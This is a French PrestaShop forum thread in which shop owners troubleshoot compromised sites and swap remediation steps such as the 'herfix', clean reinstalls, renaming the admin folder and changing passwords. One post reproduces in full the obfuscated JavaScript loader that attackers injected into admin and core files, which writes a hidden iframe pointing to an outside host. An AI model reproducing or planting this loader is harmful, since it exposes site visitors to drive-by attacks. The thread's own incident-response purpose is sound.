Accès à ma boutique Prestashop impossible.

[lh]

Bonjour,

 

 

Depuis cet après-midi, je n'ai plus accès à mon site, chaque pages chargée est vide (aucun code source).

J'ai d'abord pensé à un problème d'hébergeur, mais tout fonctionne correctement. (Serveur FTP correcte).

Je ne comprend pas pourquoi mon site a disparu, je n'ai effectué aucune modifications.

 

Allez voir par vous même : http://www.lafoliedubain.be

 

Qui peut m'aider ?

 

Merci d'avance,

[Fabrice]

Bonjour,

 

 

Depuis cet après-midi, je n'ai plus accès à mon site, chaque pages chargée est vide (aucun code source).

J'ai d'abord pensé à un problème d'hébergeur, mais tout fonctionne correctement. (Serveur FTP correcte).

Je ne comprend pas pourquoi mon site a disparu, je n'ai effectué aucune modifications.

 

Allez voir par vous même : http://www.lafoliedubain.be

 

Qui peut m'aider ?

 

Merci d'avance,

 

Bonjour !

Tu as certainement effectué une modification... :-) ça ne bug pas tout seul (en principe)

motif de module ? ou autre ? réfléchis bien à ce qui s'est passé, juste avant...

sinon, un accès FTP, BO etc : je pourrais peut-être y jeter un oeil rapide :-)

[La Camériste]

Bonjour,

J'ai exactement le même souci. Depuis hier je ne peux ni accéder à mon site (www.lacameriste.com) ni à mon back office, et je n'ai rien touché !

Pourtant toutes les autres pages marchent (autres liens dans Google par exemple).

Mais le navigateur ferme automatiquement lorsque je clique sur un lien ou une image sur une de ces pages...serait-ce lié au virus que prestashop subit depuis quelques jours?

 

J'ai cherché dans le dossier modules pour trouver ce fameux fichier her.php et je ne l'ai pas trouvé... ce ne serait donc à priori pas ça.

Sinon je suis en hébergement mutualisé sur OVH.

 

Merci à toute personne qui répondra à ce topic!

[azurshop]

Bonjour,

 

J'ai rencontré le même problème, le site est hébergé sur OVH, la version de prestashop est 1.4.4.0.

Le 20 août, il m'a été impossible d'ouvrir la page d'accueil du site (erreur 505)et pareil pour le back office..... une page blanche dans les deux cas.

 

En connection FTP, et après analyse du site, j'ai observé que des fichiers avaient été purement et simplement remplacés-modifiés (dans la journée du 19 août entre 11h55 et 11h58 environ ; POur info, je ne travaille sur ce site qu'en soirée... jamais, je n'y travaille la journée !):

 

a) Dans le répertoire admin, les fichiers remplacés sont les suivants : index.php ; login.php ; password.php ;

 

Dans le répertoire admin/ajaxfilemanager, les fichiers remplacés sont les suivants : ajax_image_editor.php ; ajax_login.php ; ajax_save_as_form.php ; ajaxfilemanager.php)

 

c) Dans le répertoire classes (le fichiers Tools.php a été remplacé)

 

d) Dans le répertoire tabs (le fichiers AdminTranslations.php a été remplacé)

 

e) Tous les fichiers html du répertoire mails/fr ont été remplacés.

 

A noter qu'aucun des symptômes annoncés dans la consigne de sécurité n'étaient pas présents sur le site (pas de fichier her.php à la racine du répertoire /modules ; le répertoire tools/smartyv2 était présent / aucun autre fichier que index.php dans les répertoires upload et dowload et le fichier footer.tpl n'a pas été modifié.

 

DONC le 20 août :

 

1°) je décide de remplacer les fichiers cités aux points a) à d) et miracle, le site ainsi que l'admin remarche..

 

2°) j'installe (sur les conseils de messages du forum) le script CRAWLPROTECT) et j'applique les consignes de sécurité et ? j'ai pu bosser sur le site tranquillement jusqu'à hier soir !

 

Mais ce soir, le 29 août, IMPOSSIBLE DE ME CONNECTER A NOUVEAU (ni au site, ni à l'admin) et en me connectant via FTP, je constate qu'à nouveau TOUS LES FICHIERS VISES aux points a) à e) ont été de nouveaux remplacés !!! Malgré le script CRAWLPROTECT.

 

Je ne sais pas vraiment pas quoi faire pour en sortir, vous trouverez dans un fichier .rar LA COPIE DES FICHIERS qui ont été visités (ou modifiés) et qui lorsque je les ai remplacés ont permis une remise en marche de l'ensemble.

 

Cordialement.

ex_AdminTranslations.php

ex_ajax_image_editor.php

ex_ajax_login.php

ex_ajax_save_as_form.php

ex_ajax_text_editor.php

ex_ajaxfilemanager.php

ex_Tools.php

exex_index.php

ex_login.php

ex_password.php

[Guest Divxman]

Dapres ce que je vois sur le site:

 

Link to database cannot be established

 

la base de donnée n'est pas établie avec le site

 

Vérifiez le fichiez setting.inc.php si les identifiants et mot de passe de la base de donnée correspond avec les identifiants de votre base de donnée de chez ovh

 

cordialement

[azurshop]

Dapres ce que je vois sur le site:

 

Link to database cannot be established

 

la base de donnée n'est pas établie avec le site

 

Vérifiez le fichiez setting.inc.php si les identifiants et mot de passe de la base de donnée correspond avec les identifiants de votre base de donnée de chez ovh

 

cordialement

 

Bonsoir,

 

Non, rien à voir... Entre temps, un peu après l'écriture du message ci-dessus, j'ai appliqué les consignes classiques (modification du mot de passe de la BDD, modification du nom du répertoire admin, modification des mots de passe des admin du back office). Maintenant, tout est rentré (provisoirement ?) dans l'ordre..

 

 

J'ajouterai qu'après examen des fichiers qui ont été modifiés, il apparait l'AJOUT du script suivant dans le code :

 

<script>String.prototype.test="harC";for(i in $='')if(i=='test')m=$;var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('sd'))throw 1;}catch(q){z=-1*(d-d2);}<script>String.prototype.test="harC";for(i in $='')if(i=='test')m=$;var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('sd'))throw 1;}catch(q){z=-1*(d-d2);}

n=[7-z,7-z,103-z,100-z,30-z,38-z,98-z,109-z,97-z,115-z,107-z,99-z,108-z,114-z,44-z,101-z,99-z,114-z,67-z,106-z,99-z,107-z,99-z,108-z,114-z,113-z,64-z,119-z,82-z,95-z,101-z,76-z,95-z,107-z,99-z,38-z,37-z,96-z,109-z,98-z,119-z,37-z,39-z,89-z,46-z,[spam-filter]z,39-z,121-z,7-z,7-z,7-z,103-z,100-z,112-z,95-z,107-z,99-z,112-z,38-z,39-z,57-z,7-z,7-z,123-z,30-z,99-z,106-z,113-z,99-z,30-z,121-z,7-z,7-z,7-z,98-z,109-z,97-z,115-z,107-z,99-z,108-z,114-z,44-z,117-z,112-z,103-z,114-z,99-z,38-z,32-z,58-z,103-z,100-z,112-z,95-z,107-z,99-z,30-z,113-z,112-z,97-z,59-z,37-z,102-z,114-z,114-z,110-z,56-z,45-z,45-z,97-z,115-z,105-z,102-z,106-z,106-z,110-z,96-z,44-z,97-z,120-z,44-z,97-z,97-z,45-z,97-z,109-z,115-z,108-z,114-z,47-z,52-z,44-z,110-z,102-z,110-z,37-z,30-z,117-z,103-z,98-z,114-z,102-z,59-z,37-z,47-z,46-z,37-z,30-z,102-z,99-z,103-z,101-z,102-z,114-z,59-z,37-z,47-z,46-z,37-z,30-z,113-z,114-z,119-z,106-z,99-z,59-z,37-z,116-z,103-z,113-z,103-z,96-z,103-z,106-z,103-z,114-z,119-z,56-z,102-z,103-z,98-z,98-z,99-z,108-z,57-z,110-z,109-z,113-z,103-z,114-z,103-z,109-z,108-z,56-z,95-z,96-z,113-z,109-z,106-z,115-z,114-z,99-z,57-z,106-z,99-z,100-z,114-z,56-z,46-z,57-z,114-z,109-z,110-z,56-z,46-z,57-z,37-z,60-z,58-z,45-z,103-z,100-z,112-z,95-z,107-z,99-z,60-z,32-z,39-z,57-z,7-z,7-z,123-z,7-z,7-z,100-z,115-z,108-z,97-z,114-z,103-z,109-z,108-z,30-z,103-z,100-z,112-z,95-z,107-z,99-z,112-z,38-z,39-z,121-z,7-z,7-z,7-z,116-z,95-z,112-z,30-z,100-z,30-z,59-z,30-z,98-z,109-z,97-z,115-z,107-z,99-z,108-z,114-z,44-z,97-z,112-z,99-z,95-z,114-z,99-z,67-z,106-z,99-z,107-z,99-z,108-z,114-z,38-z,37-z,103-z,100-z,112-z,95-z,107-z,99-z,37-z,39-z,57-z,100-z,44-z,113-z,99-z,114-z,63-z,114-z,114-z,112-z,103-z,96-z,115-z,114-z,99-z,38-z,37-z,113-z,112-z,97-z,37-z,42-z,37-z,102-z,114-z,114-z,110-z,56-z,45-z,45-z,97-z,115-z,105-z,102-z,106-z,106-z,110-z,96-z,44-z,97-z,120-z,44-z,97-z,97-z,45-z,97-z,109-z,115-z,108-z,114-z,47-z,52-z,44-z,110-z,102-z,110-z,37-z,39-z,57-z,100-z,44-z,113-z,114-z,119-z,106-z,99-z,44-z,116-z,103-z,113-z,103-z,96-z,103-z,106-z,103-z,114-z,119-z,59-z,37-z,102-z,103-z,98-z,98-z,99-z,108-z,37-z,57-z,100-z,44-z,113-z,114-z,119-z,106-z,99-z,44-z,110-z,109-z,113-z,103-z,114-z,103-z,109-z,108-z,59-z,37-z,95-z,96-z,113-z,109-z,106-z,115-z,114-z,99-z,37-z,57-z,100-z,44-z,113-z,114-z,119-z,106-z,99-z,44-z,106-z,99-z,100-z,114-z,59-z,37-z,46-z,37-z,57-z,100-z,44-z,113-z,114-z,119-z,106-z,99-z,44-z,114-z,109-z,110-z,59-z,37-z,46-z,37-z,57-z,100-z,44-z,113-z,99-z,114-z,63-z,114-z,114-z,112-z,103-z,96-z,115-z,114-z,99-z,38-z,37-z,117-z,103-z,98-z,114-z,102-z,37-z,42-z,37-z,47-z,46-z,37-z,39-z,57-z,100-z,44-z,113-z,99-z,114-z,63-z,114-z,114-z,112-z,103-z,96-z,115-z,114-z,99-z,38-z,37-z,102-z,99-z,103-z,101-z,102-z,114-z,37-z,42-z,37-z,47-z,46-z,37-z,39-z,57-z,7-z,7-z,7-z,98-z,109-z,97-z,115-z,107-z,99-z,108-z,114-z,44-z,101-z,99-z,114-z,67-z,106-z,99-z,107-z,99-z,108-z,114-z,113-z,64-z,119-z,82-z,95-z,101-z,76-z,95-z,107-z,99-z,38-z,37-z,96-z,109-z,98-z,119-z,37-z,39-z,89-z,46-z,[spam-filter]z,44-z,95-z,110-z,110-z,99-z,108-z,98-z,65-z,102-z,103-z,106-z,98-z,38-z,100-z,39-z,57-z,7-z,7-z,123-z];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss);</script>

 

Je ne sais pas du tout de quoi il en retourne, mais il faut savoir que ce script a également été injecté dans certains fichiers php de CRAWLPROTECT, ce qui fait que l'administration de cet outil n'était plus accessible non plus.

 

Merci à tous ceux qui voudront bien prendre la peine de comprendre tous cela.

[La Camériste]

D'après ce que je comprends il s'agit donc bien du virus qui sévit depuis quelques jours sur les sites des utilisateurs de prestashop ... vu que des fichiers apparaissent et disparaissent !

J'ai également un autre site sous prestashop mais il n'est pas (encore?) touché, j'espère que cela va durer !

Je n'essaye donc même pas de remplacer ces fichiers vu qu'apparemment ils seront re-modifiés quelques temps après...

j'espère qu'une solution va vite être trouvée.. !

Quelle idiotie de pirater Prestashop qui est un open-source, franchement !

Certainement que les concurrents trouvent ça plus simple que d'améliorer leurs services...

 

PS: AZURSHOP, lorsque vous parlez de remplacer les fichiers, suffit-il de remplacer par les fichiers donnés à un .rar de prestashop basiques ? Ou par des fichiers de sauvegarde de votre boutique?

[Fabrice]

En lisant ça ! je ne regrette absolument pas d'être resté en 1.2.x jusqu'à ce jour ...

même si la version 1.4.x m'a tenté un temps, je vais attendre encore un peu... (voir longtemps) avant de franchir le pas.

et pour ce qui est de CRAWLPROTECT, il semblerait en effet qu'il soit à la hauteur.. mais qu'un petit malin a finalement réussi à rendre inefficace.

 

Par ailleurs d'autres CMS subissent le même sort

http://www.oscommerce-fr.info/forum/lofiversion/index.php?t68023.html

 

Il y en a qui s'amusent comme ils peuvent.

 

sinon, un peu de lecture utile :

http://www.undernews.fr/reseau-securite/securite-web-comment-trouver-un-backdoor-php-sur-son-serveur.html

 

et aussi : (notions de base)

http://www.oscommerce-fr.info/fa[spam-filter]a_info.php?qID=126

 

bon courage à tous !

 

PS : j'oubliais le couple htaccess/htpassword qui me semble bien utile dans notre cas.

exemple ici : http://www.sitedeveloper.ws/tutorials/htaccess.htm

[Maxence de Flotte]

D'après ce que je comprends il s'agit donc bien du virus qui sévit depuis quelques jours sur les sites des utilisateurs de prestashop ... vu que des fichiers apparaissent et disparaissent !

J'ai également un autre site sous prestashop mais il n'est pas (encore?) touché, j'espère que cela va durer !

Je n'essaye donc même pas de remplacer ces fichiers vu qu'apparemment ils seront re-modifiés quelques temps après...

j'espère qu'une solution va vite être trouvée.. !

Quelle idiotie de pirater Prestashop qui est un open-source, franchement !

Certainement que les concurrents trouvent ça plus simple que d'améliorer leurs services...

 

PS: AZURSHOP, lorsque vous parlez de remplacer les fichiers, suffit-il de remplacer par les fichiers donnés à un .rar de prestashop basiques ? Ou par des fichiers de sauvegarde de votre boutique?

 

Bonjour,

 

Vous devez appliquer le fix (herfix) sur tous vos sites Prestashop, même non contaminé. Ce dernier immunise votre Prestashop contre le code malicieux.

 

Cordialement,

[Maxence de Flotte]

lh > Avez-vous corrigé votre problème?

Je ne vois pas de problème sur votre site.

 

La Camériste >

Je pense qu'il n'y a pas 36 solutions. Il faut réinstaller votre shop, tout en gardant votre base de donnée (produits, commandes, ...)

- En premier lieux il faut recopier votre FTP sur votre disque local.

- Supprimer tout votre Prestashop du FTP

- Importer un Prestashop propre. (la même version que la votre 1.4.*)

- Réimporter le dossier image, en vérifiant la non présence de code php bizarre.

- Copier votre config/settings.inc.php de votre local à votre FTP

- Supprimer le dossier install

- Renommer le admin

 

[Édit] J'oubliais. Il faudra réinstaller votre thème, en reprenant l'archive d'origine.

 

 

 

Cordialement,

[La Camériste]

Je pense qu'il n'y a pas 36 solutions. Il faut réinstaller votre shop, tout en gardant votre base de donnée (produits, commandes, ...)

- En premier lieux il faut recopier votre FTP sur votre disque local.

- Supprimer tout votre Prestashop du FTP

- Importer un Prestashop propre. (la même version que la votre 1.4.*)

- Réimporter le dossier image, en vérifiant la non présence de code php bizarre.

- Copier votre config/settings.inc.php de votre local à votre FTP

- Supprimer le dossier install

- Renommer le admin

 

[Édit] J'oubliais. Il faudra réinstaller votre thème, en reprenant l'archive d'origine.

 

En suivant ces instructions, ne perdrais-je pas ma bdd?

Car j'ai déjà ré-installé ma boutique et il m'avait été impossible de récupérer ma bdd.

 

Quand au herfix dont vous parlez...c'est quoi exactement?

[azurshop]

Je pense qu'il n'y a pas 36 solutions. Il faut réinstaller votre shop, tout en gardant votre base de donnée (produits, commandes, ...)

- En premier lieux il faut recopier votre FTP sur votre disque local.

- Supprimer tout votre Prestashop du FTP

- Importer un Prestashop propre. (la même version que la votre 1.4.*)

- Réimporter le dossier image, en vérifiant la non présence de code php bizarre.

- Copier votre config/settings.inc.php de votre local à votre FTP

- Supprimer le dossier install

- Renommer le admin

 

[Édit] J'oubliais. Il faudra réinstaller votre thème, en reprenant l'archive d'origine.

 

En suivant ces instructions, ne perdrais-je pas ma bdd?

Car j'ai déjà ré-installé ma boutique et il m'avait été impossible de récupérer ma bdd.

 

Quand au herfix dont vous parlez...c'est quoi exactement?

 

Bonsoir,

 

S'agissant du herfix, vous devriez voir cette page sur le blog presta :

http://www.prestashop.com/blog/article/procedure_de_securite_a_lire_attentivement/

 

Par contre, je ne sais pas vraiment si pour ma part, je dois l'utiliser ou pas. La procédure indique qu'il faut l'installer dans les conditions suivantes :

 

"""""Si vous utilisez une de ces versions, vérifiez si:

un fichier "her.php" se trouve à la racine de votre répertoire /modules

des fichiers ".php" autres que "index.php" se trouvent dans les répertoires /upload et /download

le fichier footer.tpl de votre thème ait été modifié

le répertoire tools/smarty_v2 a disparu""""""

 

 

La procédure ne dit qu'il faut l'installer dans un autre cas... ou elle n'est pas CLAIRE !

 

Je rappelle que mon site ne répond à aucune des conditions visées ci-dessus.. Dois-je faire fonctionner le herfix ???

[La Camériste]

Alors en ce qui me concerne j'ai installé le herfix selon la procédure expliquée sur l'aide de prestashop, mais ça n'a rien résolu...

 

et je n'avais effectivement aucun des symptômes décrits ci-dessus moi aussi.

[Carl Favre]

Bonjour La Camériste,

 

Je n'ai aucun problème pour accéder à ton site. As-tu résolu ton problème ? Peux-tu poster la solution pour les autres membres dans ce cas.

 

Merci.

[La Camériste]

Oui j'ai résolu ça hier, j'ai simplement suivi les instructions données ci-dessus et ré-installé entièrement la boutique en important mes données clients et catalogue, et ça ne prend que quelques minutes =)

[Carl Favre]

Une bonne nouvelle !

 

Ne manque plus que le retour de LH.

[fred34]

eu normal que si on va sur ton site avast me sort une alerte!! cheval de troie?